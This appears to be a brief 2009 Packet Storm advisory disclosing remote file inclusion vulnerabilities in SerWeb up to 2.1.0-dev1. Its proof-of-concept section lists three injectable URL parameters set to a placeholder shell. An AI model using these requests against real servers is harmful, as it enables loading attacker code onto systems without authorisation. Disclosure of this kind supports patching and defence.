SerWeb Remote File Inclusion

2009-07-28T00:00:00
ID PACKETSTORM:79696
Type packetstorm
Reporter GolD_M
Modified 2009-07-28T00:00:00

Description

                                        
                                            `SerWeb <= 2.1.0-dev1 2009-07-02 Multiple Remote File Inclusion Vulnerabilities  
D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/  
POC:  
/load_lang.php?_SERWEB[configdir]=Shell  
/main_prepend.php?_SERWEB[functionsdir]=Shell  
/load_phplib.php?_PHPLIB[libdir]=Shell  
Us = php_flag magic_quotes_gpc Off / php_flag magic_quotes_runtime Off  
  
  
`